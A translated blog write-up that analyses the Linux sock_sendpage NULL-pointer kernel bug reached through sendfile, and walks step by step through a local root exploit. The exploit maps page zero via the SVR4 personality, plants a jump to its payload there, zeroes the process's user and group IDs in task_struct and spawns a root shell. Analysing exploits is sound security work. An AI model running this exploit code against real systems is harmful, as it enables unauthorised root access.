Analysis of a Linux kernel bug triggered through sendfile

Source: Internet
Author: User
Tags: sendfile

After reading "Usage Analysis of sock_sendpage, a new high-risk Kernel Vulnerability", and with guidance from jiujianyi and cuer, I worked through this vulnerability from beginning to end. This post is my write-up, shared here for reference.
Please point out any shortcomings.

Kernel bug

This bug starts with the sendfile system call.
Consider sending a local file over a socket. The usual approach is to open the file and a socket, then loop: read data from the file descriptor and write it to the socket. Each iteration costs two system calls, and the data is copied from the kernel to user space (read) and then from user space back into the kernel (send).
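The read/write loop described above can be sketched as follows. This is a minimal illustration, not code from the exploit; the function name copy_with_read_write and the 4 KB buffer size are assumptions chosen for the example.

```c
#include <assert.h>
#include <errno.h>
#include <unistd.h>

/* Copy everything from in_fd to out_fd through a user-space buffer.
 * Returns the number of bytes copied, or -1 on error. */
ssize_t copy_with_read_write(int in_fd, int out_fd)
{
    char buf[4096];
    ssize_t total = 0;

    assert(in_fd >= 0 && out_fd >= 0);
    for (;;) {
        /* First system call: the kernel copies file data into buf. */
        ssize_t n = read(in_fd, buf, sizeof buf);
        if (n == 0)
            return total;               /* end of input */
        if (n < 0) {
            if (errno == EINTR)
                continue;               /* interrupted, try again */
            return -1;
        }
        /* Second system call: buf is copied back into the kernel.
         * write() may accept fewer bytes than requested, so loop. */
        for (ssize_t off = 0; off < n; ) {
            ssize_t w = write(out_fd, buf + off, (size_t)(n - off));
            if (w < 0) {
                if (errno == EINTR)
                    continue;
                return -1;
            }
            off += w;
        }
        total += n;
    }
}
```

Every pass through the outer loop crosses the user/kernel boundary at least twice, which is exactly the overhead sendfile removes.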

sendfile wraps the whole transfer in a single system call, which avoids the repeated system calls and the bulk copying of data between kernel space and user space.

ssize_t sendfile(int out_fd, int in_fd, off_t *offset, size_t count);

Although the system call takes two descriptors, in and out, there are restrictions: in must be a regular file and out must be a socket (I do not know whether later kernel versions relax this restriction).
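For comparison, here is a hedged sketch of the same transfer done with sendfile. The helper names send_file_range and sendfile_demo are hypothetical, and the demo uses an AF_UNIX socket pair as the output side purely for illustration. On the restriction mentioned above: the sendfile(2) manual page states that since Linux 2.6.33 out_fd may be any file, while earlier kernels require a socket.

```c
#include <assert.h>
#include <errno.h>
#include <stdlib.h>
#include <sys/sendfile.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Send `count` bytes of in_fd, starting at file offset 0, to out_fd.
 * Returns the number of bytes sent, or -1 on error. */
ssize_t send_file_range(int out_fd, int in_fd, size_t count)
{
    off_t offset = 0;       /* sendfile advances this for us */
    size_t left = count;

    assert(out_fd >= 0 && in_fd >= 0);
    while (left > 0) {
        ssize_t n = sendfile(out_fd, in_fd, &offset, left);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        if (n == 0)
            break;          /* reached end of file early */
        left -= (size_t)n;
    }
    return (ssize_t)(count - left);
}

/* Usage sketch: push 5 bytes from a temporary file into one end of a
 * socket pair and read them back from the other end.
 * Returns 0 on success, -1 on any failure. */
int sendfile_demo(void)
{
    char path[] = "/tmp/sendfile-demo.XXXXXX";
    char got[8] = {0};
    int sv[2];
    int ok = -1;
    int fd = mkstemp(path);

    if (fd < 0)
        return -1;
    unlink(path);
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) {
        close(fd);
        return -1;
    }
    if (write(fd, "hello", 5) == 5 &&
        send_file_range(sv[0], fd, 5) == 5 &&
        read(sv[1], got, sizeof got) == 5 &&
        got[0] == 'h' && got[4] == 'o')
        ok = 0;
    close(fd);
    close(sv[0]);
    close(sv[1]);
    return ok;
}
```

No user-space buffer appears in send_file_range: the data moves from the file to the socket entirely inside the kernel.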

How is the sendfile system call implemented in the kernel? It is fairly involved. In essence the kernel does the work that user space used to do: it creates a pipe object as a buffer, reads data from in_fd into the pipe, writes the data from the pipe to out_fd, and repeats until the end condition is met.
The path that writes data to out_fd is roughly:
sys_sendfile
=> Entry point
do_sendfile
=> Parameter checks. The file structure for out_fd must provide a sendpage method (out_file->f_op->sendpage)
do_splice_direct
=> Ends up calling out_file->f_op->splice_write; since out_file is a socket, its f_op->splice_write is generic_splice_sendpage
generic_splice_sendpage
=> Finally calls out_file->f_op->sendpage, which for a socket is sock_sendpage.

The code for sock_sendpage is as follows:

struct socket *sock;
int flags;

sock = file->private_data;

flags = !(file->f_flags & O_NONBLOCK) ? 0 : MSG_DONTWAIT;
if (more)
    flags |= MSG_MORE;

return sock->ops->sendpage(sock, page, offset, size, flags);

Note where the bug is: sock->ops->sendpage is called without first checking whether the function pointer is NULL.
(The call sock->ops->sendpage here amounts to out_file->private_data->ops->sendpage. out_file->private_data points to a struct socket, because this descriptor represents a socket.)

But can sock->ops->sendpage be NULL? Searching the kernel source shows that not every socket type implements a sendpage function. Most socket types that do not implement it set the pointer to sock_no_sendpage (a generic fallback routine). A few socket types, however, never set sock->ops->sendpage at all (an unset pointer defaults to NULL), for example PF_PPPOX and PF_BLUETOOTH. (The exploit code discussed here uses PF_PPPOX. I later found that PF_BLUETOOTH also works, but PF_INET does not.)
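To make the missing check concrete, here is a small user-space model of an operations table whose sendpage slot may be left unset. All names (demo_ops, demo_sock, demo_sendpage_checked and so on) are hypothetical stand-ins, not kernel identifiers, and this is only a sketch of one defensive pattern rather than the kernel's actual patch.

```c
#include <assert.h>
#include <stddef.h>

enum { DEMO_PATH_FALLBACK = 1, DEMO_PATH_NATIVE = 2 };

/* Simplified stand-ins for the kernel's per-protocol ops table and socket. */
struct demo_ops {
    int (*sendpage)(const char *data, size_t size);
};

struct demo_sock {
    const struct demo_ops *ops;
};

/* Plays the role of a protocol-specific sendpage implementation. */
int demo_native_sendpage(const char *data, size_t size)
{
    (void)data;
    (void)size;
    return DEMO_PATH_NATIVE;
}

/* Plays the role of a generic fallback such as sock_no_sendpage. */
int demo_fallback_sendpage(const char *data, size_t size)
{
    (void)data;
    (void)size;
    return DEMO_PATH_FALLBACK;
}

/* The vulnerable pattern is a bare `sock->ops->sendpage(data, size)`.
 * Here the slot is tested first, and an unset slot takes the fallback. */
int demo_sendpage_checked(const struct demo_sock *sock,
                          const char *data, size_t size)
{
    assert(sock != NULL && sock->ops != NULL);
    if (sock->ops->sendpage == NULL)
        return demo_fallback_sendpage(data, size);
    return sock->ops->sendpage(data, size);
}
```

A table that is only partially initialized, such as `struct demo_ops unset = { NULL };`, leaves the slot NULL, which mirrors the socket families that never set sendpage.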

Exploiting the bug

As shown above, the kernel's sendfile path does not check whether sock->ops->sendpage is NULL, and sock->ops->sendpage can in fact be NULL.

What happens when an ordinary program calls through a NULL function pointer? It crashes. So how can this be turned into a way to gain root? Let's walk through the exploit code from the analysis cited at the top, step by step.
The main() function:

char template[] = "/tmp/padlina.XXXXXX";
int fdin, fdout;
void *page;

uid = getuid(); // get the user ID; it is needed later
gid = getgid(); // get the group ID; it is needed later
setresuid(uid, uid, uid); // make sure the real, effective and saved user IDs of the process are all uid
setresgid(gid, gid, gid); // make sure the real, effective and saved group IDs of the process are all gid

// This is the aggressive part: map the page at addresses 0x0 to 0x1000 and make it executable.
if ((personality(0xffffffff)) != PER_SVR4) {
    if ((page = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
        perror("mmap");
        return -1;
    }
} else {
    if (mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) {
        perror("mprotect");
        return -1;
    }
}
// Even more aggressive: write a JMP to kernel_code at the address 0 that was just mapped.
*(char *)0 = '\x90'; // NOP
*(char *)1 = '\xe9'; // JMP rel32
*(unsigned long *)2 = (unsigned long)&kernel_code - 6; // relative jump: the displacement is counted from the end of the JMP instruction, which sits at address 6

// Create a temporary file to serve as the source file
if ((fdin = mkstemp(template)) < 0) {
    perror("mkstemp");
    return -1;
}
// Create a socket; note that its protocol family is PF_PPPOX
if ((fdout = socket(PF_PPPOX, SOCK_DGRAM, 0)) < 0) {
    perror("socket");
    return -1;
}
// The key step: sendfile
unlink(template);
ftruncate(fdin, PAGE_SIZE);
sendfile(fdout, fdin, NULL, PAGE_SIZE);

From the discussion so far, this sendfile call makes the kernel call address 0 while it is still inside the system call. And address 0 now holds a JMP to kernel_code.
kernel_code is simply a function compiled together with this main(), as we will see below.
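The "- 6" in the jump operand follows from how x86 encodes a near relative jump: the 32-bit displacement is added to the address of the instruction after the jmp. The sketch below only computes the six bytes into an ordinary buffer to show the arithmetic. The function names and the sample target address used in the note after it are assumptions for illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Encode "nop; jmp rel32" into buf, as if buf were placed at address
 * `base`. The displacement is measured from the end of the jmp. */
void encode_nop_jmp(uint8_t buf[6], uint32_t base, uint32_t target)
{
    uint32_t next_insn = base + 1 + 5;      /* 1-byte nop + 5-byte jmp */
    uint32_t rel32 = target - next_insn;    /* wraps modulo 2^32 */

    assert(buf != NULL);
    buf[0] = 0x90;                          /* nop */
    buf[1] = 0xe9;                          /* jmp rel32 opcode */
    memcpy(&buf[2], &rel32, sizeof rel32);  /* host byte order */
}

/* Recover the jump target from the encoded bytes. */
uint32_t decode_jmp_target(const uint8_t buf[6], uint32_t base)
{
    uint32_t rel32;

    assert(buf != NULL);
    memcpy(&rel32, &buf[2], sizeof rel32);
    return base + 6 + rel32;
}
```

With base equal to 0, as in the exploit, the displacement is simply the target address minus 6. For a sample target of 0x08048500 that is 0x080484fa.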

Current situation

Once sendfile is called, the CPU enters kernel mode, where it can do anything the CPU is capable of. Normally only kernel code runs in kernel mode, and the kernel itself guarantees this.
But now the kernel code calls the function at address 0 and lands in the user-supplied kernel_code. As a result, the programmer can do in kernel_code anything the kernel can do.
Note: returning from kernel mode to user mode normally goes through a special instruction (such as iret), which changes the CPU privilege level at the same time. That is not what happens here: the kernel code simply makes a direct call into the function the programmer wrote, without returning to user mode.

On the other hand, kernel code can reach kernel data structures easily because the kernel is compiled as one unit: object addresses are known and structure layouts are clear. What can the programmer write in kernel_code? It has the same access rights as kernel code, but it knows neither the addresses nor the state of the data, so it is effectively working blind.
Next we will see how the author of the sample code feels his way forward inside kernel_code.

Starting to do bad things

The kernel_code function consists of three steps:

1. Obtain task_struct

uint *p = get_current();

The get_current code is as follows:

__asm__ __volatile__ (
    "movl %%esp, %%eax;" // copy the stack pointer into eax
    "andl %1, %%eax;"    // AND it with ~8191 (clear the low 13 bits)
    "movl (%%eax), %0"   // load the word stored there into curr; this is the task_struct pointer
    : "=r" (curr)
    : "i" (~8191)
);

In the kernel, each process has a thread_info structure and a kernel stack. The two share two consecutive pages, with the thread_info structure at the start and the stack behind it. The first member of thread_info is task, a pointer to the task_struct structure (commonly called the process control block), which holds the main information about the process.
(Note: in Linux 2.4, these two pages held the task_struct structure itself together with the kernel stack. There was no thread_info layer.)
On a 32-bit system a page is 4 KB, so the low 12 bits of a page's start address are 0. The thread_info structure is aligned to two pages, so the low 13 bits of its start address are 0.
Clearing the low 13 bits of the stack pointer therefore yields the address of the thread_info structure of the current process. Dereferencing that address as a pointer (reading the first word of the structure, which is the task pointer) then yields the task_struct structure.
(In fact, going through a piece of assembly to get task_struct is clumsy. A simpler way is to take the address of any variable defined on the current stack and clear its low 13 bits.)
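The masking step is plain arithmetic and can be checked in isolation. The sketch below works on sample 32-bit values only. The name demo_thread_info_base and the sample stack pointer values are assumptions for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Two 4 KB pages shared by thread_info and the kernel stack. */
#define DEMO_THREAD_SIZE 8192u

/* Round a kernel stack pointer down to the start of its two-page block,
 * which is where thread_info lives in the layout described above. */
uint32_t demo_thread_info_base(uint32_t kernel_sp)
{
    /* The mask trick only works for power-of-two sizes. */
    assert((DEMO_THREAD_SIZE & (DEMO_THREAD_SIZE - 1u)) == 0);
    return kernel_sp & ~(DEMO_THREAD_SIZE - 1u);   /* same as sp & ~8191 */
}
```

For example, both 0xc1234abc and 0xc1235fff fall in the block that starts at 0xc1234000, while 0xc1236000 is already the start of the next block.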

2. With task_struct in hand, what next? The sample code modifies the user information recorded in task_struct so that the process looks like one started by root.

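for (i = 0; i < 1024-13; i++) {
    // look for four consecutive words equal to uid followed by four equal to gid
    if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid
        && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) {
        p[0] = p[1] = p[2] = p[3] = 0; // all user IDs become 0 (root)
        p[4] = p[5] = p[6] = p[7] = 0; // all group IDs become 0 (root)
        p = (uint *) ((char *)(p + 8) + sizeof(void *)); // skip the eight IDs and one pointer-sized field
        p[0] = p[1] = p[2] = ~0; // set the next three words to all ones (presumably the capability sets)
        break;
    }
    p++;
}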

Recall that main() fetched the user ID and group ID and set them on the process (that is, in the task_struct of the process). The loop therefore searches the task_struct structure for a run of words matching these IDs. The position of the IDs may differ between kernel versions, but they always appear in the same order.
A match means the storage location of the IDs has been found. Setting them all to 0 turns the process into a root process.
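The search itself is an ordinary pattern scan over an array of words. The following user-space model runs it on a mock array rather than on any kernel structure. The function name find_id_run and the mock values in the note after it are assumptions for illustration.

```c
#include <assert.h>
#include <stddef.h>

/* Return the index of the first run of four words equal to `uid`
 * followed by four words equal to `gid`, or -1 if there is none. */
long find_id_run(const unsigned *words, size_t n, unsigned uid, unsigned gid)
{
    assert(words != NULL);
    /* Stop early enough that p[7] never reads past the array. */
    for (size_t i = 0; i + 8 <= n; i++) {
        const unsigned *p = words + i;

        if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid &&
            p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid)
            return (long)i;
    }
    return -1;
}
```

On a mock array {7, 8, 1000, 1000, 1000, 1000, 100, 100, 100, 100, 0, 0}, searching for uid 1000 and gid 100 returns index 2. This also shows why the heuristic depends on the IDs being stored contiguously and in a fixed order.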

However, this way of modifying the UID does not work on newer kernels. There the UID and GID are no longer stored directly in task_struct. They are grouped into a structure called cred, and task_struct only holds a pointer to the corresponding cred structure.

3. Return to user mode
The identity has now been changed. The program returns to user mode, starts a shell, and enjoys life as root.

__asm__ __volatile__ (
    "movl %0, 0x10(%%esp);"
    "movl %1, 0x0c(%%esp);"
    "movl %2, 0x08(%%esp);"
    "movl %3, 0x04(%%esp);"
    "movl %4, 0x00(%%esp);"
    "iret"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
        "i" (USER_CS), "r" (exit_code)
);

This code writes the return frame onto the kernel stack, and iret then returns to user mode. The return address is exit_code, another function compiled together with main(). Its code is as follows:
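The five stores correspond to the five words that iret pops on a 32-bit return to a less privileged level. As a hedged illustration, the layout can be written as a C structure. The structure and function names are hypothetical, and any values passed in are placeholders rather than the constants used by the exploit.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Words consumed by iret, lowest address (top of stack) first. */
struct demo_iret_frame {
    uint32_t eip;     /* 0x00: address where user-mode execution resumes */
    uint32_t cs;      /* 0x04: user code segment selector */
    uint32_t eflags;  /* 0x08: flags register */
    uint32_t esp;     /* 0x0c: user stack pointer */
    uint32_t ss;      /* 0x10: user stack segment selector */
};

/* Check that the structure offsets match the offsets used by the stores. */
void demo_check_frame_layout(void)
{
    assert(offsetof(struct demo_iret_frame, eip) == 0x00);
    assert(offsetof(struct demo_iret_frame, cs) == 0x04);
    assert(offsetof(struct demo_iret_frame, eflags) == 0x08);
    assert(offsetof(struct demo_iret_frame, esp) == 0x0c);
    assert(offsetof(struct demo_iret_frame, ss) == 0x10);
}

/* Build a frame; arguments are in the same order as the five movl
 * operands (%0 to %4) in the assembly above. */
struct demo_iret_frame demo_make_frame(uint32_t ss, uint32_t esp,
                                       uint32_t eflags, uint32_t cs,
                                       uint32_t eip)
{
    struct demo_iret_frame f;

    f.eip = eip;
    f.cs = cs;
    f.eflags = eflags;
    f.esp = esp;
    f.ss = ss;
    return f;
}
```

Read against the assembly, %4 (exit_code) lands in the eip slot and %0 (USER_SS) in the ss slot, so after iret the CPU continues at exit_code on the user stack given by STACK(exit_stack).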

if (getuid() != 0) {
    fprintf(stderr, "failed\n");
    exit(-1);
}
execl("/bin/sh", "sh", "-i", NULL);

The program is now back in user mode. It calls getuid to check whether it has become root, and if so it starts a shell.

Highlights

The description above runs through the whole vulnerability in one go, but it glossed over an important detail: the mapping of address 0. I think this is the finest touch in the entire attack code. The code is roughly as follows:

if ((personality(0xffffffff)) != PER_SVR4) {
    mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0);
} else {
    mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
}


Why does mapping address 0 need this branch instead of a direct mmap? What do the personality and mprotect functions do here?
In fact, the executable built from this attack code (call it exploit) is not run directly from the shell. It is launched by a small C program (see run.c in the source code):

int main(void) {
    if (personality(PER_SVR4) < 0) {
        perror("personality");
        return -1;
    }
    fprintf(stderr, "padlina z lublina!\n");
    execl("./exploit", "exploit", 0);
}


As we can see, the personality function is called before exploit is executed.

The Linux kernel is highly compatible: besides executables built for Linux, it can also run executables built for other operating systems. Executables from Windows and similar systems run through user-space compatibility programs (such as Wine), while executables from some UNIX-like systems can be run by Linux directly.
However, running executables from another UNIX-like system is not seamless. An "execution domain" has to be set to tell the kernel which system the current executable comes from, so that the kernel runs the program according to that system's rules (memory layout, signal handling and so on).

The personality function shown above sets the execution domain (the default is Linux), and the launcher uses it to set the program's execution domain to SVR4 (System V Release 4, an older UNIX-like system). So when the exploit maps address 0 it takes the mprotect branch (personality(0xffffffff) returns the current execution domain).
mmap allocates a virtual memory area in the process and can set its attributes at allocation time. mprotect only changes the attributes of an existing virtual memory area. In the attack code above, mprotect is what makes address 0 executable.
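The query form personality(0xffffffff) and the flag carried by PER_SVR4 can be examined with a few lines of C. This is a sketch that assumes the constants from glibc's <sys/personality.h>. The helper names are hypothetical.

```c
#include <assert.h>
#include <sys/personality.h>

/* Return the current execution domain without changing it. */
int demo_current_persona(void)
{
    int persona = personality(0xffffffff);

    assert(persona != -1);   /* the query form is not expected to fail */
    return persona;
}

/* Nonzero if the persona value asks the kernel to map page zero. */
int demo_maps_page_zero(unsigned long persona)
{
    return (persona & MMAP_PAGE_ZERO) != 0;
}

/* The low byte selects the base execution domain; the rest are flags. */
unsigned long demo_base_domain(unsigned long persona)
{
    return persona & PER_MASK;
}
```

PER_SVR4 carries MMAP_PAGE_ZERO while PER_LINUX does not, which is why the launcher switches the execution domain before calling execl.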

On my system, if exploit is run directly from the shell (taking the mmap branch), mmap fails. On 32-bit Linux the process address space is laid out upward from 0x08048000 (executable code, global data, heap, file mappings, stack), and on my system the range from address 0 to 0x08048000 cannot be mapped.

The exploit can still map address 0 because a process in an execution domain such as SVR4 is allowed to have address 0 mapped. More precisely, address 0 is already mapped by default in that domain, and the code only changes the attributes of the mapping.

The following can be found in the Linux 2.6.29.4 source:
personality.h defines the options for the SVR4 execution domain as follows (note the MMAP_PAGE_ZERO flag):
enum {
    ......
    PER_SVR4 = 0x0001 | STICKY_TIMEOUTS | MMAP_PAGE_ZERO,
    ......
};


binfmt_elf.c: load_elf_binary(), which loads executables in the ELF format (the most common format on Linux), contains the following code (special handling for the MMAP_PAGE_ZERO flag):
......
if (current->personality & MMAP_PAGE_ZERO) {
    /* Why this, you ask???  Well SVr4 maps page 0 as read-only,
       and some applications "depend" upon this behavior.
       Since we do not have the power to recompile these, we
       emulate the SVr4 behavior. Sigh. */
    down_write(&current->mm->mmap_sem);
    error = do_mmap(NULL, 0, PAGE_SIZE, PROT_READ | PROT_EXEC,
                    MAP_FIXED | MAP_PRIVATE, 0);
    up_write(&current->mm->mmap_sem);
}
......



See the author's comment in the code. This is how address 0 ends up mapped.

 

I also wrote an article analyzing this kernel bug:
http://hi.baidu.com/wzt85/blog/item/a11e013e3384f2f3838b13e6.html
